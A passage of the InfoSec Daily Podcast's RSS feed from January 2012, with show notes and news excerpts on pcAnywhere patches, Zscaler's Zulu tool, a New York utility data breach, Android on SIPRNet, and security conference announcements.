<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The other flaw relies on overwriting files installed by pcAnywhere in order to escalate a user&#39;s privileges, although miscreants will already need access to vulnerable system to do this.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Neither flaw has been weaponised into exploits by hackers, reckons Symantec. The security firm credits Edward Torkington (of NGS Secure) and independent security researcher Tad Seltzer with discovering the flaws.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://research.zscaler.com/2012/01/introducing-project-zulu.html"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://research.zscaler.com/2012/01/introducing-project-zulu.html</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Our goal in building Zulu, was to provide a simple and straightforward interface accessible to anyone regardless of security knowledge, while still delivering granular results that are of value to those that are more security savvy. I believe we&#39;ve achieved this by providing a UI that requires no additional input beyond the UI to be analyzed, while allowing a few necessary advanced options, (User-Agent and Referer) when encountering malware triggered only when certain input variables are met. Results also display an overall ranking of </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:italic;font-variant:normal;text-decoration:none;vertical-align:baseline;">Benign, Suspicious or Malicious</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">, but also include details of elements that went into the overall score.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="https://threatpost.com/en_us/blogs/data-breach-affects-two-million-ny-customers-state-commission-investigate-012412#.Tx8yS3ae0YA.reddit"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://threatpost.com/en_us/blogs/data-breach-affects-two-million-ny-customers-state-commission-investigate-012412#.Tx8yS3ae0YA.reddit</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The New York State Public Service Commission announced yesterday they&#39;ll be looking into a data breach that may have exposed the personal information of almost two million customers to unknown attackers.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">An employee from a software consulting firm contracted by New York State Electric &amp; Gas (NYSEG) and Rochester Gas and Electric (RG&amp;E) was allowed unauthorized access to the company&rsquo;s databases, prompting the investigation, according to a statement by the the Commission on Monday.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Both companies are owned by Iberdrola USA of Rochester, N.Y. and serve approximately 1.8 million customers collectively.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">While NYSEG and RG&amp;E claim there is no proof customers&rsquo; data may have been mishandled, they have begun to send preventive notifications regarding the breach to their customers. The exposed data includes Social Security Numbers, dates of birth and some financial account information, according to a press release (.PDF) issued by the NY Commission on Monday. </span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><a href="http://fcw.com/articles/2012/01/24/android-smart-phones-tablets-classified-sipr-network.aspx"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://fcw.com/articles/2012/01/24/android-smart-phones-tablets-classified-sipr-network.aspx</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">New security standards expected to be approved soon would let devices powered by the Android operating system use the Defense Department&#39;s classified networks, according to an Army official.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DOD and National Institute of Standards and Technology are close to approving the standards, according to Michael McCarthy, program manager and director of operations, Army Brigade Modernization Command. The standards will allow service members, DOD personnel and other government users to use the devices on classified networks, including the military&rsquo;s Secret Internet Protocol Router Network (SIPRNet).</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">McCarthy spoke Jan. 24 at the Soldier Technology 2012 conference in Arlington, Va. He said the goal is to have Android smart phones and tablets able to connect to SIPR-level systems by the summer. This development marks a critical step forward for tactical operations and represents the high priority that mobile communications have become, he said.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;There were going to be no information assurance [standards issued] until 2014, but with the groundswell of interest and needs, the agencies responsible for certification are giving this a higher priority,&rdquo; McCarthy said. &ldquo;The key is that it allows users from DOD and other agencies to access databases that in the past they couldn&rsquo;t get to using a smart phone.&rdquo;</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source:</span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><a href="http://www.sophos.com/en-us/security-news-trends/reports/security-threat-report/html-01.aspx"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sophos.com/en-us/security-news-trends/reports/security-threat-report/html-01.aspx</span></a></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">In 2011, a number of highly visible cyberattacks made news headlines around the world, but the underlying problem affects us all. It seems that the cybercriminals are getting bolder in their attacks as the availability of commercial tools makes mass generation of new malicious code campaigns and exploits easier. The net result has been significant growth in volume of malware and infections.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">And for 2012, I anticipate growing sophistication in web-borne attacks, even broader use of mobile and smart devices, and rapid adoption of cloud computing bringing new security challenges.</span></p>
<p>&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The web will undoubtedly continue to be the most prominent vector of attack. Cybercriminals tend to focus where the weak spots are and use a technique until it becomes far less effective. We saw this with spam email, which is still present but less popular with cybercriminals as people deploy highly effective gateways. The web remains the dominant source of distribution for malware&mdash;in particular malware using social engineering, or targeting the browser and associated applications with exploits. Social media platforms and similar web applications have become hugely popular with the bad guys, a trend that is only set to continue.</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&#8230;</span></p>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-578-malwareanywhere-zulu-nypii-dodroid-threat-of-the-year/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3417/0/infosec-daily-podcast-episode-578.mp3" length="19220735" type="audio/mpeg" />
		<itunes:duration>0:40:02</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 578 for January 26, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, and Varun Sharma.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool a[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 578 for January 26, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, and Varun Sharma.
	&#160;
Announcements:
Unsung Heros
Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John Riley has started to gather suggestions for your &#8220;unsung hero&#8221; of the tools world. &#160;He is looking specifically to gather a list of tools that aren&#8217;t on every penetration testers, or forensic investigators list, but that you have respect for. &#160;http://blog.c22.cc/2012/01/13/unsung-heros

	Information Security Blogger Awards 2012
	Since we were over looked again for the Best Podcast on Security you can email ashimmy@hotmail.com with your name, email address and ISD Podcast as your write-in nominee. &#160;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &#160;Vote for your favorite blogs as well on http://www.ashimmy.com.
	Brad Smith (theNurse)
	We all know and love Brad Smith, aka theNurse. &#160;His humor and smiling positivity is a wonderful example for our community. &#160;At Hacker Halted he had a massive stroke and has been in the hospital ever since.
	Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &#160;Please feel free to check in for status or to donate. &#160;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.
	http://www.social-engineer.org/brad-smith-updates/
	http://www.social-engineer.org/bradsmithdonation/
	Schmoocon Epilogue
	When: After Schmoocon
	Where: Washington, DC
	Hit up anyone in NOVA Hackers
	Metasploit Framework Unleashed Cincinnati
	When: February 11, 2012. 
	Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&#8217;s College of Informatics
	https://msfucincy.wordpress.com/
	$20 donation for #HFC
	Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	CFP now open!
	LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
	DerbyCon 2012 &#8211; &#34;Dropping the Deuce&#34;
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: &#160;http://www.theregister.co.uk/2012/01/25/pcanywhere_patch/
&#160;
Symantec is urging users to patch pcAnywhere, its remote control application, following the discovery of a brace of serious security flaws.
&#160;
The most severe of the two holes allows hackers to remotely inject code into vulnerable systems &#8211; made possible because a service on TCP port 5631 permits a fixed-length buffer overflow during the authentication process. This line of attack ought to be blocked by a properly configured firewall, but it&#39;d be stupid to rely on that without patching vulnerable systems.
&#160;
The other flaw relies on overwriting files installed by pcAnywhere in order to escalate a use[...]</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, Dr. Bonez, and Varun Sharma.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 577 &#8211; Pentest Lessons, Kelihos, O2mo, Privacy Backlash, Hiding Bad Reviews &amp; DNS Changer Change Back</title>
		<link>http://www.isdpodcast.com/episode-577-pentest-lessons-kelihos-o2mo-privacy-backlash-hiding-bad-reviews-dns-changer-change-back</link>
		<comments>http://www.isdpodcast.com/episode-577-pentest-lessons-kelihos-o2mo-privacy-backlash-hiding-bad-reviews-dns-changer-change-back#comments</comments>
		<pubDate>Thu, 26 Jan 2012 02:03:57 +0000</pubDate>
		<dc:creator>Karthik.Rangarajan</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3415</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 577 for January 25, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Varun Sharma. &#160; Announcements: Unsung Heros Have you ever stumbled on a tool and wondered &#8220;Why didn&#8217;t I know this existed!&#8221; or &#8220;If only I&#8217;d had this last week on that test&#8221;&#8230; Chris John [...]]]></description>
			<content:encoded><![CDATA[<p><span id="internal-source-marker_0.637490207515345" style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 577 for January 25, 2012. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Boris Sverdlik, Karthik Rangarajan, and Varun Sharma.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Unsung Heros</span></p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Have you ever stumbled on a tool and wondered &ldquo;Why didn&rsquo;t I know this existed!&rdquo; or &ldquo;If only I&rsquo;d had this last week on that test&rdquo;&hellip; Chris John Riley has started to gather suggestions for your &ldquo;unsung hero&rdquo; of the tools world. &nbsp;He is looking specifically to gather a list of tools that aren&rsquo;t on every penetration testers, or forensic investigators list, but that you have respect for. &nbsp;</span><a href="http://blog.c22.cc/2012/01/13/unsung-heros"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.c22.cc/2012/01/13/unsung-heros</span></a></p>
<p>
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Information Security Blogger Awards 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Since we were over looked again for the Best Podcast on Security </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">you can email </span><a href="mailto:ashimmy@hotmail.com"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">ashimmy@hotmail.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> with your name, email address and ISD Podcast as your write-in nominee. &nbsp;Please note, you have to provide your blog or podcast URL so that it can be verified that you are a blogger or podcaster. &nbsp;Vote for your favorite blogs as well on </span><a href="http://www.ashimmy.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.ashimmy.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad Smith (theNurse)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">We all know and love Brad Smith, aka theNurse. &nbsp;His humor and smiling positivity is a wonderful example for our community. &nbsp;At Hacker Halted he had a massive stroke and has been in the hospital ever since.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Brad and his wife did not ask for this help, but as a community we feel that if we can help we want to. &nbsp;Please feel free to check in for status or to donate. &nbsp;Either way we thank you and I know Brad thanks your for your support, prayers and positive thoughts.</span></p>
<p>	<a href="http://www.social-engineer.org/brad-smith-updates/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/brad-smith-updates/</span></a><br />
	<a href="http://www.social-engineer.org/bradsmithdonation/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:#ffffff;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.org/bradsmithdonation/</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">ShmooCon 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: January 27th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington Hilton Hotel, Washington, DC</span><br />
	<a href="http://www.shmoocon.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.shmoocon.org</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Schmoocon Epilogue</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: After Schmoocon</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Washington, DC</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Hit up anyone in NOVA Hackers</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Metasploit Framework Unleashed Cincinnati</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: February 11, 2012. </span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Digitorium in Griffin Hall, the home of Northern Kentucky University&rsquo;s College of Informatics</span><br />
	<a href="https://msfucincy.wordpress.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">https://msfucincy.wordpress.com/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">$20 donation for #HFC</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9, 2012<br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; &quot;Dropping the Deuce&quot;</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
